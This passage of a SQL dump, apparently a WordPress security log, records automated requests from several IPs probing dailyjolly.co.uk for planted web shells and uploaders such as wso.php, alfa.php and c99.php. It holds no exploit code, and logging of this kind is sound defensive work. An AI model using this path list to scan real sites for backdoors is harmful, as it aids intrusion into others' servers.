|0|0|0|dailyjolly.co.uk/new_license.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319906.1389,100,'VcPEXaHJg1mD7RCfy3NLbojM','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/theme-configurator/mini.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319908.9181,100,'dCVBQv8SLTM7We1s6htEojA3','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/widget-logic/mini.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319913.5694,100,'buYkongAFtzfcBvROK1SlPMI','','13|0|0|0|dailyjolly.co.uk/wp-admin/css/index.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319914.8455,100,'5F6dz9MZwg4Aa8CQI7muktGB','','13|0|0|0|dailyjolly.co.uk/1975.phP',0,13,0),('216.226.146.228',3638727396,'',0,1674319919.6368,100,'xF2Pj98o1yn4IeYmkKhLDwTV','','13|0|0|0|dailyjolly.co.uk/1975.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319921.5842,100,'6C8T3sPi4vnmkIDQc7lhwjUt','','13|0|0|0|dailyjolly.co.uk/radio.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319925.8289,100,'YafG9M43BQV6ln2zXiRuIHCb','','13|0|0|0|dailyjolly.co.uk/wp-includes/wp-class.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319929.3212,100,'vt0O8Ii4RWLHbalVUqujNeh6','','13|0|0|0|dailyjolly.co.uk/xleet-shell.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319932.5404,100,'Nrx9Kzhk20afCPEOJjcZXobw','','13|0|0|0|dailyjolly.co.uk/wp-content/radio.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319935.1807,100,'zgXi8AIarutwybDhl4SCLjFO','','13|0|0|0|dailyjolly.co.uk/wp-includes/radio.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319936.9443,100,'XEn4WyUCIs7JG0tQ6OovxYwS','','13|0|0|0|dailyjolly.co.uk/fx.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319939.8938,100,'0MtZQFk9b2oqSxDKX7LynuGc','','13|0|0|0|dailyjolly.co.uk/',0,13,0),('216.226.146.228',3638727396,'',0,1674319943.1812,100,'yBbNE4lGRoxedtkjcfMJuQpm','','13|0|0|0|dailyjolly.co.uk/',0,13,0),('216.226.146.228',3638727396,'',0,1674319945.9310,100,'XH7t4EujOTz9QSAmC8c5ULf2','','13|0|0|0|dailyjolly.co.uk/wp-admin/images/atomlib.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319951.0857,100,'3fIhQBS98GTWdxPUtcEyXAYM','','13|0|0|0|dailyjolly.co.uk/gel4y.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319954.1295,100,'RQ0jfSkvqGaim41ChJFwAbc6','','13|0|0|0|dailyjolly.co.uk/jindex.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319956.5824,100,'2xjvIqgLQUPE7eknocbHyWMT','','13|0|0|0|dailyjolly.co.uk/wp-content/about.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319962.7998,100,'Cw9prhHSY0MfL1iK5ogmRdye','','13|0|0|0|dailyjolly.co.uk/sh.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319966.3611,100,'j8XpFe4L3m7rvGyVwfu19gYJ','','13|0|0|0|dailyjolly.co.uk/wp-includes/991176.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319971.0340,100,'FlhcapfJ89uX54QHqsiDUe3j','','13|0|0|0|dailyjolly.co.uk/wp-admin/maint/about.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319976.6326,100,'3a4HLktNwBOde9IzpiXnbCrf','','13|0|0|0|dailyjolly.co.uk/fox.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319980.2508,100,'iVtDve5sLANUZCYIxaEJk4WF','','13|0|0|0|dailyjolly.co.uk/wp-admin/x.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319983.6233,100,'nSWjUEdBt3yYqoL809rTcpQ6','','13|0|0|0|dailyjolly.co.uk/fw.ph',0,13,0),('216.226.146.228',3638727396,'',0,1674319988.7951,100,'voiXnQ6J9zGxFL3SN4fb8wHe','','13|0|0|0|dailyjolly.co.uk/server.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319991.6390,100,'IKSpP9EVn5Ubs8yd1uTjqLH7','','13|0|0|0|dailyjolly.co.uk/wp-includes/fw.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319994.7348,100,'Rj2Bn5bF0hMwsUX7rCyPfKd8','','13|0|0|0|dailyjolly.co.uk/4.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319997.2813,100,'kOm03fVWu1FwXHIxC47Pst9T','','13|0|0|0|dailyjolly.co.uk/5.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320000.1947,100,'IBHqk49csw0mefyQhbGgAMit','','13|0|0|0|dailyjolly.co.uk/images/about.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320005.6036,100,'cyeJhlp174SP9wVrFxMaW85L','','13|0|0|0|dailyjolly.co.uk/wp-load.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320011.2665,100,'e2Gn3NED68fVKHkmbrswMRoa','','13|0|0|0|dailyjolly.co.uk/wp-admin/fw.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320014.7946,100,'Z8m4cthQM3q95FNIWrJpvlix','','13|0|0|0|dailyjolly.co.uk/mari.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320017.4481,100,'MfJkdy2nKrR9xbaUIShLC7sD','','13|0|0|0|dailyjolly.co.uk/swm.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320020.4095,100,'k8KDcB0LC5V92ORz6TSvsiEI','','13|0|0|0|dailyjolly.co.uk/wp-admin/radio.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320023.2946,100,'nHYoG1bKS4gjPpZBWNadQki2','','13|0|0|0|dailyjolly.co.uk/wp-includes/about.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320025.1393,100,'b6yKXYaRCMfA3FdSgPZT2Dkp','','13|0|0|0|dailyjolly.co.uk/wp-content/wso.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320028.4087,100,'1oKhmlrT6efa5DWG3BjIiXYt','','13|0|0|0|dailyjolly.co.uk/wp-admin/wso.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320032.0811,100,'iUdrg67wc1ykPXSHKN38sBoL','','13|0|0|0|dailyjolly.co.uk/w3llstore.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320035.2376,100,'4QJqCIGEhz3pnfB1WrP7XMVZ','','13|0|0|0|dailyjolly.co.uk/wp-content/fx.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320038.7170,100,'JVMehr7qFSIo3HpxWuk8AKUX','','13|0|0|0|dailyjolly.co.uk/wp-content/x.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320040.3318,100,'brIJChQ4O3VFMlZ5Ad9aSGKT','','13|0|0|0|dailyjolly.co.uk/wp-admin/alfa.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320044.1427,100,'RM2ndK0sjSoTuHip3mWZC5cV','','13|0|0|0|dailyjolly.co.uk/gank.php.PhP',0,13,0),('216.226.146.228',3638727396,'',0,1674320046.0559,100,'lZGoEKzirtukpjAfxnVTROgd','','13|0|0|0|dailyjolly.co.uk/style.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320049.7272,100,'tGe9b7qd5ROZzhCDjfJL3k2B','','13|0|0|0|dailyjolly.co.uk/s_e.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320054.2138,100,'XFJRC0wofcK7qLOPdrSHh3Ik','','13|0|0|0|dailyjolly.co.uk/s_ne.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320057.7485,100,'Vgzf9lDLx7Iv82wUm14CAtOy','','13|0|0|0|dailyjolly.co.uk/beence.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320062.3575,100,'MQhFs5ZmIkBvr8VYPuWSJ1oz','','13|0|0|0|dailyjolly.co.uk/wp-signin.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320064.3132,100,'wGYS49R1DnB2pH0TLbmakzQU','','13|0|0|0|dailyjolly.co.uk/moduless.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320066.7298,100,'6yK9SPFuRLHtkXAbYsoJG0hj','','13|0|0|0|dailyjolly.co.uk/export.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320068.2544,100,'QkWifjeFUAy1L6g50XoR9ZEN','','13|0|0|0|dailyjolly.co.uk/legion.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320070.5541,100,'yiJLQVdHvn3z6I7eP2rbjDow','','13|0|0|0|dailyjolly.co.uk/system_log.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320073.0611,100,'iNyMGUTC0EhW95VzwSrxc23D','','13|0|0|0|dailyjolly.co.uk/shells.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320075.6184,100,'pyPA9uMlBbmsTYqr4JdiUfzZ','','13|0|0|0|dailyjolly.co.uk/wp-includes/wp-atom.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320078.9645,100,'VGsyKlXS931x4g7cz0qNeA5E','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/ubh/up.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320083.4124,100,'pIz1u3RUS0PFoYHnX9bmt7xJ','','13|0|0|0|dailyjolly.co.uk/wp-content/mu-plugins/db-safe-mode.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320086.4954,100,'KfpVPNO3ezDjsgAQY7b1uE9k','','13|0|0|0|dailyjolly.co.uk/wp-content/db-cache.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320088.8765,100,'7yzXRZAVJWTnlhBEfp46D5S3','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/backup_index.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320093.5032,100,'wdFyKEWH4T1k8QzM6iC9uIr5','','13|0|0|0|dailyjolly.co.uk/wp-content/themes/config.bak.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320095.0181,100,'9v7CuFnIrao3HMAEXkcmbwjf','','13|0|0|0|dailyjolly.co.uk/wp-includes/images/css.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320097.1531,100,'iTenLu24vrYpGKBAW7VhRaCf','','13|0|0|0|dailyjolly.co.uk/wp-includes/css/css.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320099.8990,100,'UCzFApB5JxMWsh2arYloje6T','','13|0|0|0|dailyjolly.co.uk/wp-content/uploads/wp-stream.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320104.7078,100,'7ZXIBm8OE0TedNCikGKSUzFg','','13|0|0|0|dailyjolly.co.uk/wp-beckup.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320106.5007,100,'sJGFa6v7t0uABmpqEXwKIgDy','','13|0|0|0|dailyjolly.co.uk/wp-blog-post.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320108.3189,100,'a9UylxchRIgnHzvMbTme4o7w','','13|0|0|0|dailyjolly.co.uk/wp-content/uploads/wp-blockdown.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320110.2357,100,'doe6cSkR0V5PtKp7LyYgmn9X','','13|0|0|0|dailyjolly.co.uk/wp-admin/includes/class-wp-media-list-data.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320112.9751,100,'OIYi9G36eWFs8PfVXQrl12DH','','13|0|0|0|dailyjolly.co.uk/wp-admin/style.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320115.7191,100,'yxz5Y0A8FkEMif7JNaCutsmR','','13|0|0|0|dailyjolly.co.uk/6.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320119.6868,100,'3lae1VH745pZcIwfXvjuzA8b','','13|0|0|0|dailyjolly.co.uk/7.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320121.2045,100,'nzMNeAS63819fRZtvWdmLFoY','','13|0|0|0|dailyjolly.co.uk/8.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320123.6687,100,'UuVrQlx6BzwSMKJah49A2ycq','','13|0|0|0|dailyjolly.co.uk/9.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320126.5194,100,'rbuIxslO5iMWKzGfJnmDZY6y','','13|0|0|0|dailyjolly.co.uk/10.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320129.2084,100,'H5nuOzWUr2esANEgIjD9tkVa','','13|0|0|0|dailyjolly.co.uk/wp_class_datalib.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320131.0069,100,'DrXAqMznlOtZSCc5FUyaYmhB','','13|0|0|0|dailyjolly.co.uk/wp-includes/wp_class_datlib.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320132.3632,100,'4wkLRinWJq2jtXSrVhKxE9cm','','13|0|0|0|dailyjolly.co.uk/wp-includes/pomo/wp_class_datalib.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320135.6842,100,'sueh5Po7xOVpr4MTLvEKjz1F','','13|0|0|0|dailyjolly.co.uk/01.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320140.2423,100,'EdASFruasHG9Y3zJ0Z84Ngvo','','13|0|0|0|dailyjolly.co.uk/marijuana.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320142.7127,100,'nQU6PCf850IRdeoJkL2DHMxt','','13|0|0|0|dailyjolly.co.uk/1xleet.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320146.6880,100,'RBzKTEpIPjQqy8J37uN01296','','13|0|0|0|dailyjolly.co.uk/wp-content/shell.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320148.5169,100,'YTjcie6tSLVU1IJfqDPBZ530','','13|0|0|0|dailyjolly.co.uk/wp-content/fw.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320150.8501,100,'omsLkPQ29N1wuETY36IdxUhG','','13|0|0|0|dailyjolly.co.uk/wp-admin/shell.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320153.6824,100,'E8GSW4NxtmKL0AkzRQsi6O7b','','13|0|0|0|dailyjolly.co.uk/wp-admin/wp.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320156.4273,100,'PynVBF2IZrw4a5JhfU6e3Kou','','13|0|0|0|dailyjolly.co.uk/4index.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320157.7507,100,'wo7YzGBdHDcWZC5b6LXPs2FU','','13|0|0|0|dailyjolly.co.uk/5index.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320160.9745,100,'nZJSpbxakMDeFQOWAsGtyLNr','','13|0|0|0|dailyjolly.co.uk/6index.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320164.1467,100,'7lxhANun86riTwvIEJXft92V','','13|0|0|0|dailyjolly.co.uk/7index.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320172.6648,100,'06gSQ3KPIJFW2fhkDORlyY7q','','13|0|0|0|dailyjolly.co.uk/8index.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320175.7569,100,'nS3akweb2H7ftzPsyET514lB','','13|0|0|0|dailyjolly.co.uk/9index.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320179.4485,100,'rH3QPuUKvjpN87D2wTGCfMX9','','13|0|0|0|dailyjolly.co.uk/Leaf.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320183.8093,100,'Z5UJ9moIid42cKT1ONpVej6t','','13|0|0|0|dailyjolly.co.uk/Uploader.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320187.7827,100,'JQzaxP4bW5cusTRq0NeOSDX3','','13|0|0|0|dailyjolly.co.uk/wp-includes/wp-red.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320190.8759,100,'51T0SqYtPMlueIBidWOw8sFf','','13|0|0|0|dailyjolly.co.uk/.well-known/radio.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320193.8095,100,'n4bMUH0C1KESo8a6TgDA7ZNp','','13|0|0|0|dailyjolly.co.uk/alfashell.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320196.1315,100,'VWOjPJeIR1ClwpY8qxkz46sU','','13|0|0|0|dailyjolly.co.uk/am.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320199.0052,100,'7ZohrQgOtlXP2vjm6wJ51cek','','13|0|0|0|dailyjolly.co.uk/blog/fw.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320201.2421,100,'TLf25yHrlqVQcgPmaExjDsNU','','13|0|0|0|dailyjolly.co.uk/contacts.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320205.6931,100,'W59NUinK3ReOHE7jV0gd6yrw','','13|0|0|0|dailyjolly.co.uk/demo328/fw.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320209.8186,100,'FTe56UBPDjI3tuGVZxRfmygz','','13|0|0|0|dailyjolly.co.uk/gif.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320211.3899,100,'KS41sfpDmwJIZei59hCoEBP2','','13|0|0|0|dailyjolly.co.uk/goods.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320213.7500,100,'qkZ4KRlXILEGbiU1aMx5vz6H','','13|0|0|0|dailyjolly.co.uk/images/sym.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320217.1182,100,'8l3x4ZKe9yiFTqJzgfQHMGdV','','13|0|0|0|dailyjolly.co.uk/lab.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320220.9351,100,'i2uvbNFf0ByU4LASEZwkMCjG','','13|0|0|0|dailyjolly.co.uk/leaf_mailer.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320223.7644,100,'VrBeixIgNzHW8c4up6wLaSYs','','13|0|0|0|dailyjolly.co.uk/leaf_php.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320226.5116,100,'HWCLOJz87iBsGjFxmowcDval','','13|0|0|0|dailyjolly.co.uk/libraries/joomla/jmail.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320228.7763,100,'MEXPLGmholnuzD4efFVdNJ3R','','13|0|0|0|dailyjolly.co.uk/libraries/joomla/jmails.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320231.2809,100,'supg9UEnVxkMSjR2Xe6rDWtY','','13|0|0|0|dailyjolly.co.uk/mailer1.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320236.1749,100,'Me1DR7jlotnkCpAGyY0EU9Ws','','13|0|0|0|dailyjolly.co.uk/ms.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320238.5132,100,'yNHAb0ZvkoUpMiIa8DJYCtxr','','13|0|0|0|dailyjolly.co.uk/rxr.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320241.2814,100,'merUA89Bc1wqEyTbZQ473vMi','','13|0|0|0|dailyjolly.co.uk/srx.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320245.0984,100,'anFB5JD6y3IYG4UdolbECHsf','','13|0|0|0|dailyjolly.co.uk/tuco.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320249.6931,100,'8b6oMftwXkmVsOCyJpurGzlR','','13|0|0|0|dailyjolly.co.uk/unix.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320252.2438,100,'nf6lXaNFwTQZHPruKhjbA8MJ','','13|0|0|0|dailyjolly.co.uk/uploads/up.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320254.7665,100,'12qPN7DXaCBpWrfgbowTE953','','13|0|0|0|dailyjolly.co.uk/wp-admin/css/colors/coffee/fw.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320257.2305,100,'STBCGxa876qnO5cjmRFZ321w','','13|0|0|0|dailyjolly.co.uk/wp-admin/css/fw.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320259.1878,100,'IVqkCpXTZl65wcL4HF7iAEm3','','13|0|0|0|dailyjolly.co.uk/wp-admin/includes/fw.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320261.7505,100,'xTM2v7UQ8jtH4s9CLiqNYKnf','','13|0|0|0|dailyjolly.co.uk/wp-admin/maint/fw.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320267.2403,100,'LDapyYXlz3OBdvPo1Kr9W5hE','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320269.3716,100,'1TfwhQ7kEuDHFl2s4RvMxoya','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/xichang/x.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320272.0977,100,'sytiXwUo8xkpHnGBZ46NSm91','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/zedd/1.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320277.8934,100,'d6MCet9430PZUvqaO78BWL5g','','13|0|0|0|dailyjolly.co.uk/wp-content/up.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320281.2193,100,'tmuB0pedCYSU6MVvg45zXlo8','','13|0|0|0|dailyjolly.co.uk/wp-content/wp.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320285.4919,100,'xcRX21PdBNmWSvIzkCOYeLu8','','13|0|0|0|dailyjolly.co.uk/wp-mna.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320289.0649,100,'5sWFrEMAcS1mURDXJpQIogih','','13|0|0|0|dailyjolly.co.uk/uploads/upload.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320290.8198,100,'JPSf2cxIg9vpLohyw14lMbaz','','13|0|0|0|dailyjolly.co.uk/wpx.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320294.1379,100,'1BUOuewh2nEM6aRD8ogPtNYb','','13|0|0|0|dailyjolly.co.uk/images/c99.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320297.5820,100,'pjV5OZgIawC9fTAomvxutzPD','','13|0|0|0|dailyjolly.co.uk/xhell.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320299.0206,100,'5DvQgXnWF1J9uOcwtlAMoGep','','13|0|0|0|dailyjolly.co.uk/xmrlpc.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320301.4360,100,'zOo3GfjdMF7NCJkiYmaUlT9n','','13|0|0|0|dailyjolly.co.uk/xz.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320302.9920,100,'a6EmZ4TecILQpyXoxk58Kvj3','','13|0|0|0|dailyjolly.co.uk/yuuki.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320306.3545,100,'6lFKT3xyANfqnpkYwjOB4dVb','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/upspy/index.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320309.3623,100,'nWtSTHfJDwcVjsg2y5mql3ZQ','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/ubh/index.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320312.2037,100,'FuqHwXImtnUWQpKz87NhaAoE','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320317.8414,100,'KSCJlLsAfBE6wPpm109XUIgi','','13|0|0|0|dailyjolly.co.uk/wp-content/themes/gaukingo/db.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320320.7413,100,'7MI0ewdBWKpjPrb2Zm3yFfu4','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/three-column-screen-layout/db.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320323.8355,100,'50ZLeWC6r4VoMlI3ztpmNwq2','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/xichang/x.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320325.7077,100,'rBUQux7PORVCnaMfk2DpHj35','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/html404/index.html',0,13,0),('216.226.146.228',3638727396,'',0,1674320328.3970,100,'kMVD3Hg76BAuCEpXxTWQr50f','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/wp-db-ajax-made/wp-ajax.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320331.1873,100,'KjxqmfEhV1NWop7GcHbiO6Te','','13|0|0|0|dailyjolly.co.uk/wp-admin/shapes.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320333.8673,100,'DsV2Zc69kJKQjg0Erb4G8CtL','','13|0|0|0|dailyjolly.co.uk/XxX.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320336.0297,100,'aWyTXiBK7PEgcF6AwuxrHqv4','','13|0|0|0|dailyjolly.co.uk/Marvins.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320339.0880,100,'04x6hfotUSDJRY7OW5CyAQiZ','','13|0|0|0|dailyjolly.co.uk/wp-includes/css/modules.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320344.0134,100,'BQ4rC2DdtewSc53AEqkGUzOI','','13|0|0|0|dailyjolly.co.uk/olux.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320346.8366,100,'qwBp5ZUQC4oVsO6vHDn2yjrz','','13|0|0|0|dailyjolly.co.uk/indoxploit.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320349.2818,100,'tK8hTnrLwlzAoFyVN9sMjxQe','','13|0|0|0|dailyjolly.co.uk/wso.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320353.0406,100,'35U0KwSWAFeYZDR9fGO2agyt','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/css-ready-sel/file.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320355.9630,100,'3H6jhozOZ2KdJPif0MNGUYvC','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/css-ready/file.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320359.0704,100,'19ldaEn6DYwIArJWmKu2kGhz','','13|0|0|0|dailyjolly.co.uk/wp-content/think.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320363.2021,100,'gb5AD0csR8ovFhCXISlLtHT3','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/upspy/con.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320367.4970,100,'C8Zb7BE6jsoFYGQiOeLJ095D','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/upspy/up.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320371.0324,100,'hAa8ClomSn6XONGg147ruMiR','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/upspy/sllolx.php',0,13,0),('216.226.146.228',3638727396,'',0,1674320373.1571,100,'yAPfoV7UBmx0DbRFiuMK6ISL','','13|0|0|0|dailyjolly.co.uk/wp-commentin.php',0,13,0),('104.243.43.10',1760766730,'',0,1674328919.6524,55,'yBLCdKeUhr4qI3bHkTOzEAJN','','19|0|0|0|www.dailyjolly.co.uk/wp-plain.php',0,19,0),('104.243.43.10',1760766730,'',0,1674328919.9580,55,'LWlJwbs2XOphuNUFZEq0ten1','','19|0|0|0|www.dailyjolly.co.uk/atnbqmuy.php',0,19,0),('20.210.237.151',349367703,'',0,1674337439.2594,55,'UzvTtLf86eDIq5Woyl23chH7','','19|0|0|0|www.dailyjolly.co.uk/wp-plain.php',0,19,0),('20.210.237.151',349367703,'',0,1674337439.8767,55,'qZt9z41C6Kkmriua2UXb3hng','','19|0|0|0|www.dailyjolly.co.uk/pirrlruq.php',0,19,0),('20.14.84.163',336483491,'',0,1674339894.7865,55,'HVQhKwr4v8TbPIM9cBDEnFje','','19|0|0|0|www.dailyjolly.co.uk/.sts.php',0,19,0),('20.14.84.163',336483491,'',0,1674339895.7687,55,'6SYBo2xreIspqK8EjilvyWTG','','19|0|0|0|www.dailyjolly.co.uk/.Wp-back.phP',0,19,0),('20.14.84.163',336483491,'',0,1674339896.7074,55,'S1uTl4dVIw3DyAvmibC2e856','','19|0|0|0|www.dailyjolly.co.uk/fx.php',0,19,0),('20.14.84.163',336483491,'',0,1674339897.7248,55,'2FwqDntVpQE0rhgulfZ1BMy8','','19|0|0|0|www.dailyjolly.co.uk/shx.php',0,19,0),('20.14.84.163',336483491,'',0,1674339898.6415,55,'1l9PmyC3OftjULgx6Q7XqVwe','','19|0|0|0|www.dailyjolly.co.uk/wp_content/wp-1ogin_bak.php',0,19,0),('20.14.84.163',336483491,'',0,1674339898.6684,10,'1l9PmyC3OftjULgx6Q7XqVwe','','707|0|0|0|www.dailyjolly.co.uk/wp_content/wp-1ogin_bak.php',0,707,0),('20.14.84.163',336483491,'',0,1674339899.5913,55,'CFU4GE25B70XkenJSpaVLRgN','','19|0|0|0|www.dailyjolly.co.uk/wso112233.php',0,19,0),('20.14.84.163',336483491,'',0,1674339900.5332,55,'lkFmpCoDjXxYH5UaqBZIzE3O','','19|0|0|0|www.dailyjolly.co.uk/bala.php',0,19,0),('20.14.84.163',336483491,'',0,1674339902.0007,55,'WqEyQxUZ914awLvJoblHKG7e','','19|0|0|0|www.dailyjolly.co.uk/mini.php',0,19,0),('20.14.84.163',336483491,'',0,1674339902.9599,55,'Uf2Il6muCcvZNOyDoMeG4xV9','','19|0|0|0|www.dailyjolly.co.uk/xleet.php',0,19,0),('20.14.84.163',336483491,'',0,1674339903.9039,55,'UmA5FpVjP0YdenXqxiy3GWcQ','','19|0|0|0|www.dailyjolly.co.uk/wp-class.php',0,19,0),('20.14.84.163',336483491,'',0,1674339904.8906,55,'iOYy6nVaeKx0s5kTSCzWj41N','','19|0|0|0|www.dailyjolly.co.uk/x.php',0,19,0),('20.14.84.163',336483491,'',0,1674339905.8544,55,'nOUPZNb71I9DEjmKfgYM3hCV','','19|0|0|0|www.dailyjolly.co.uk/0z.php',0,19,0),('20.14.84.163',336483491,'',0,1674339906.9289,55,'54NHKdVlSM3YaI1fhnv0DZCj','','19|0|0|0|www.dailyjolly.co.uk/m.php',0,19,0),('20.14.84.163',336483491,'',0,1674339907.